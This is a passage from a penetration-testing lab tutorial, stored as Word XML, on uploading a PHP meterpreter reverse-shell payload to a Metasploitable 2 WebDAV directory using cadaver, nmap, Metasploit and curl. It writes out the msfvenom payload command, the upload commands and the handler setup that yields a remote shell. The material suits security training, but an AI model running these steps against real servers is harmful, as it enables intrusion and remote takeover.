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09" w:rsidRPr="00037DBC" w:rsidRDefault="00F11409" w:rsidP="009B30E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F11409" w:rsidRPr="00037DBC" w:rsidRDefault="00F11409" w:rsidP="00F11409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037DBC">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exploiting PUT Method in Multiple Ways</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F11409" w:rsidRPr="00037DBC" w:rsidRDefault="00F11409" w:rsidP="00F11409">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F11409" w:rsidRPr="00037DBC" w:rsidRDefault="00F11409" w:rsidP="00F11409">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037DBC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Target Machine </w:t>
      </w:r>
      <w:r w:rsidRPr="00037DBC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(IP: 192.168.92.129</w:t>
      </w:r>
      <w:r w:rsidRPr="00037DBC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00037DBC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37DBC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37DBC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacking Machine </w:t>
      </w:r>
      <w:r w:rsidRPr="00037DBC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(IP: 192.168.92</w:t>
      </w:r>
      <w:r w:rsidRPr="00037DBC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.128)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F11409" w:rsidRPr="00037DBC" w:rsidRDefault="00F11409" w:rsidP="00F11409">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037DBC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">OS: </w:t>
      </w:r>
      <w:r w:rsidRPr="00037DBC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ubuntu Linux (Metasploitable 2)</w:t>
      </w:r>
      <w:r w:rsidRPr="00037DBC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00037DBC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00037DBC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00037DBC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">OS: </w:t>
      </w:r>
      <w:r w:rsidRPr="00037DBC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00037DBC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00037DBC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00037DBC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F11409" w:rsidRPr="00037DBC" w:rsidRDefault="00F11409" w:rsidP="00F11409">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00037DBC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00037DBC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D1502" w:rsidRPr="00037DBC" w:rsidRDefault="007D1502" w:rsidP="009B30E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7D1502" w:rsidRPr="0016159A" w:rsidRDefault="00F11409" w:rsidP="009B30E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6159A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step</w:t>
      </w:r>
      <w:r w:rsidR="00447DE8" w:rsidRPr="0016159A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidRPr="0016159A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00447DE8" w:rsidRPr="0016159A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00037DBC" w:rsidRPr="0016159A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Scan the target machine using</w:t>
      </w:r>
      <w:r w:rsidR="007D1502" w:rsidRPr="0016159A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00037DBC" w:rsidRPr="0016159A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Nikto.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00037DBC" w:rsidRDefault="00037DBC" w:rsidP="00037DB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16159A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">“nikto -h </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="0016159A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://192.168.92.129/dav/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0016159A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00990148" w:rsidRDefault="00990148" w:rsidP="00037DB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3140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k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8A" w:rsidRPr="0016159A" w:rsidRDefault="00A9198A" w:rsidP="00037DB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037DBC" w:rsidRPr="0016159A" w:rsidRDefault="00037DBC" w:rsidP="00037DBC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6159A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Step 2: Let’s p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 xml:space="preserve">repare the malicious file to be uploaded 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using msfvenom.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00037DBC" w:rsidRDefault="00037DBC" w:rsidP="00037DBC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Pr="0016159A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.92.128 lport=4444 -f raw</w:t>
      </w:r>
      <w:r w:rsidRPr="0016159A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005549C3" w:rsidRDefault="005549C3" w:rsidP="00037DBC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1546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fven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9C3" w:rsidRDefault="005549C3" w:rsidP="00037DBC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549C3" w:rsidRDefault="005549C3" w:rsidP="00037DBC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549C3" w:rsidRDefault="005549C3" w:rsidP="00037DBC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549C3" w:rsidRPr="0016159A" w:rsidRDefault="005549C3" w:rsidP="00037DBC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549C3" w:rsidRDefault="005549C3" w:rsidP="009B30E0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47DE8" w:rsidRDefault="0016159A" w:rsidP="009B30E0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 xml:space="preserve">Step 3: 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Copy the code from </w:t>
      </w:r>
      <w:r w:rsidRPr="0016159A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&lt;?php to die()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 and save it in a file with .php extension as </w:t>
      </w:r>
      <w:r w:rsidRPr="0016159A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hell.php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 .</w:t>
      </w:r>
      <w:r w:rsidR="00001DD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 xml:space="preserve">This will be utilized </w:t>
      </w:r>
      <w:r w:rsidR="00001DD8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">and uploaded 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on the web server</w:t>
      </w:r>
      <w:r w:rsidR="00001DD8">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> later</w:t>
      </w:r>
      <w:r w:rsidRPr="0016159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A9198A" w:rsidRDefault="00A9198A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A9198A" w:rsidRDefault="00A9198A" w:rsidP="009B30E0">
      <w:pPr>
        <w:spacing w:line="24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198A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step 4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 L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oad the Metasploit framework by typ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ng msfconsole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star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xploit/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multi/handler.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et the required variables, run and wait for the connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00646D4D" w:rsidRPr="00A9198A" w:rsidRDefault="00646D4D" w:rsidP="009B30E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31495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e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9A" w:rsidRDefault="0016159A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7D1502" w:rsidRPr="00037DBC" w:rsidRDefault="007D1502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37DBC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exploiting PUT Method Using Cadaver</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C8232F" w:rsidRPr="00037DBC" w:rsidRDefault="00224D46" w:rsidP="009B3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37DBC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">cadaver </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00037DBC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cstheme="minorHAnsi"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://192.168.92.129/dav/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C8232F" w:rsidRDefault="00224D46" w:rsidP="009B3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37DBC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>put /home/kali/Desktop/Pentest/shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E637D2" w:rsidRPr="00037DBC" w:rsidRDefault="00E637D2" w:rsidP="00E637D2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81977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ver p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58" w:rsidRPr="007B4CF3" w:rsidRDefault="007B4CF3" w:rsidP="009B3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DE0458" w:rsidRPr="00A9198A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">tart </w:t>
      </w:r>
      <w:r w:rsidR="00DE0458">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00DE0458">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>exploit/</w:t>
      </w:r>
      <w:r w:rsidR="00DE0458" w:rsidRPr="00A9198A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>multi/handler</w:t>
      </w:r>
      <w:r w:rsidR="00DE0458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="00DE0458" w:rsidRPr="00A9198A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r w:rsidR="00DE0458">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Se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he required values</w:t>
      </w:r>
      <w:r w:rsidR="00DE0458">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, run and wait for the connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B4CF3" w:rsidRPr="00E637D2" w:rsidRDefault="007B4CF3" w:rsidP="009B3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lick on the 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uploaded </w:t>
      </w:r>
      <w:r w:rsidRPr="007B4CF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hell.php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. Once run, we will get the TCP reverse connection automatically on the meterpreter shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E637D2" w:rsidRPr="007B4CF3" w:rsidRDefault="00E637D2" w:rsidP="00E637D2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ver me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D2" w:rsidRDefault="00E637D2" w:rsidP="009B30E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637D2" w:rsidRDefault="00E637D2" w:rsidP="009B30E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637D2" w:rsidRDefault="00E637D2" w:rsidP="009B30E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637D2" w:rsidRDefault="00E637D2" w:rsidP="009B30E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637D2" w:rsidRDefault="00E637D2" w:rsidP="009B30E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D1502" w:rsidRPr="00037DBC" w:rsidRDefault="007D1502" w:rsidP="009B30E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37DBC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exploiting PUT Method Using Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB3EBB" w:rsidRPr="00EB3EBB" w:rsidRDefault="00EB3EBB" w:rsidP="009B30E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the malicious file </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB3EBB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nmap.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> by creating a copy from </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB3EBB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shell.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB3EBB" w:rsidRPr="00EB3EBB" w:rsidRDefault="00EB3EBB" w:rsidP="00D261E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EB3EBB">
        <w:rPr>
          <w:rFonts w:cstheme="min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nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB3EBB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB3EBB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>specify the filename and URL path with NSE arguments</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB3EBB" w:rsidRDefault="00EB3EBB" w:rsidP="00EB3EBB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EB3EBB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> “nmap -p 80 192.168.92.129 --script http-put --script-args </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB3EBB" w:rsidRPr="00EB3EBB" w:rsidRDefault="00EB3EBB" w:rsidP="00EB3EBB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tp-p</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB3EBB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ut.url='/dav/nmap.php',</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB3EBB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http-put.file='/home/kali/Desktop/Pentest/nmap.php'”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB3EBB" w:rsidRDefault="00EB3EBB" w:rsidP="00EB3EB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EB3EBB" w:rsidRDefault="00EB3EBB" w:rsidP="00EB3EBB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a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C6" w:rsidRPr="007B4CF3" w:rsidRDefault="00B735C6" w:rsidP="00B735C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 xml:space="preserve">tar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“exploit/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multi/handl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et the required values, run and wait for the connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D1502" w:rsidRPr="00B735C6" w:rsidRDefault="00B735C6" w:rsidP="00B735C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lick on the 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uploaded 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nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="007B4CF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php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. Once run, we will get the TCP reverse connection automatically on the meterpreter shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B735C6" w:rsidRPr="00B735C6" w:rsidRDefault="00514BCE" w:rsidP="00B735C6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35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map me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97" w:rsidRPr="00037DBC" w:rsidRDefault="00C63497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37DBC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exploiting PUT Method Using Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA21E7" w:rsidRPr="00514BCE" w:rsidRDefault="00514BCE" w:rsidP="00514BCE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the malicious file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msf</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB3EBB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> by creating a copy from </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB3EBB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shell.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA21E7" w:rsidRDefault="00514BCE" w:rsidP="009B30E0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 Metasploit Framework and search for an exploit by typing ”search </w:t>
      </w:r>
      <w:r w:rsidR="00CA21E7" w:rsidRPr="00037DBC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http_put</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00514BCE" w:rsidRPr="00037DBC" w:rsidRDefault="00423A29" w:rsidP="00514BCE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732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 htt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9" w:rsidRDefault="00423A29" w:rsidP="00423A2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423A29" w:rsidRDefault="00423A29" w:rsidP="00423A2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423A29" w:rsidRDefault="00423A29" w:rsidP="00423A2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423A29" w:rsidRDefault="00423A29" w:rsidP="00423A2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423A29" w:rsidRDefault="00423A29" w:rsidP="00423A2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423A29" w:rsidRDefault="00423A29" w:rsidP="00423A2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687D94" w:rsidRDefault="00514BCE" w:rsidP="00687D9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</w:t>
      </w:r>
      <w:r w:rsidR="00CA21E7" w:rsidRPr="00037DBC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“</w:t>
      </w:r>
      <w:r w:rsidR="00CA21E7" w:rsidRPr="00037DBC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>auxiliary/scanner/http/http_put</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” and set the values.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00687D94" w:rsidRPr="00687D94" w:rsidRDefault="00423A29" w:rsidP="00687D9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2020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94" w:rsidRPr="007B4CF3" w:rsidRDefault="00687D94" w:rsidP="00687D9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 xml:space="preserve">tar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“exploit/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multi/handl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et the required values, run and wait for the connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE6BFF" w:rsidRPr="00CE6BFF" w:rsidRDefault="00687D94" w:rsidP="00CE6BFF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lick on the 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uploaded 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msf</w:t>
      </w:r>
      <w:r w:rsidRPr="007B4CF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php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. Once run, we will get the TCP reverse connection automatically on the meterpreter shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CE6BFF" w:rsidRPr="00CE6BFF" w:rsidRDefault="00CE6BFF" w:rsidP="00CE6BFF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321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sf me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E7" w:rsidRPr="00037DBC" w:rsidRDefault="00CA21E7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35AA1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37DBC">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Exploiting PUT Method Using Curl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00535AA1" w:rsidRPr="00514BCE" w:rsidRDefault="00535AA1" w:rsidP="00535AA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the malicious file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB3EBB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> by creating a copy from </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB3EBB">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>shell.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00535AA1" w:rsidRDefault="00535AA1" w:rsidP="00535AA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cURL on the terminal with the following command usage:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00535AA1" w:rsidRPr="00535AA1" w:rsidRDefault="00535AA1" w:rsidP="00535AA1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535AA1">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
